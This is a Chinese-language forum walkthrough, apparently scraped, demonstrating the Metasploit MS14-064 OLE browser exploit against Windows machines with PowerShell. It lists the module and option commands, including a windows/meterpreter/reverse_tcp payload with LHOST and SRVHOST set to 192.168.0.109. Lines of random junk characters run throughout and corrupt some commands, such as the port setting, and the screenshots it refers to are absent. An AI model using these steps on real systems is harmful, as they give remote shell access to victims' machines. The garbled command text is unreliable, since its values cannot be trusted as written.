+ O" q- j' |- S. @$ c2 I1 O
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示0 W% q- L& j* Q' Q1 b
+ c; {- a4 _8 S7 u2 N3 c* E" f& Q8 E
% a2 z# z" E5 a 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
) Q& h/ |; g, h& I+ d( d
7 K; h( K/ g- `! Q0 e; h; r/ N) Q* q. K5 F) S- e9 c7 r! L
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp; k* e- N( n5 {; ^9 c
& u# R4 O! `8 b; B# S- k! M
$ r9 L$ s/ l" u) z+ H
set AllowPowershellPrompt true
( `/ o& k0 K- |1 f6 H3 m
% T4 u; c. V+ r, T2 Y, u: l$ d
( b( R% `: V8 j& S Set LHOST 192.168.0.109# q* W- X$ |" A( D9 s# q
+ w9 w5 y( u! i6 B
& ?/ v7 }+ |: L5 h( C, l
set SRVHOST 192.168.0.109
6 j+ k- [) ]; i. ?$ O& S' c
% k$ W- b, _$ ~9 V
. h4 n) w- A4 F5 u4 _ Set uripath share
* [& I) K6 K$ ]) b
, X" C6 |$ W" ^4 p; D- I9 d; d5 ]
Set srvport 800 h4 y$ Z; g1 T
+ }7 K+ L: G' \& X( s ]* f
( Y) o. y! e2 l" |; ]; k2 D5 `/ u
& [7 q& |! k/ B! `6 C, J" \; E
% G" h8 I! A5 x
" g5 {0 V( ?9 J7 k" G: M( y+ W & S3 N' P: B/ D9 r: X
0 i* _4 ?- Q {' [: v. t( q4 y
7 w2 C' T' R- m& |8 ^
1 K# \3 |: q$ o$ O
. @, V6 S, F3 g* d7 H+ e- C* H! M- k$ r2 _
/ Z0 [+ Z7 m& U" R6 P( Y
5 B7 `, Z( X2 n+ D) M7 d( \
Q% m6 r1 R9 ?- [$ D
$ n3 y# Y7 L. E# ?- H
2 [" W- b# J5 g9 x, U; g) h, }' x) y% C3 ~4 f4 T
下面我们来访问本地地址如图:
! U# s8 f. m+ c% A( C% o
1 G% q$ |* R: x9 u, R$ W& [4 U6 t
3 f9 q7 A" v$ k6 e$ v ( g$ ^6 l8 L% h3 v" O
3 E4 D2 Y$ B- i8 V6 K" {
5 v+ F4 @7 M& L* p' A
: ?5 p+ }5 @% E8 l+ H
- ?0 b1 K. d. f8 t# h; L
2 A2 j5 e/ d" n& z! W
; R7 O' Y1 x6 G; k* @4 f, r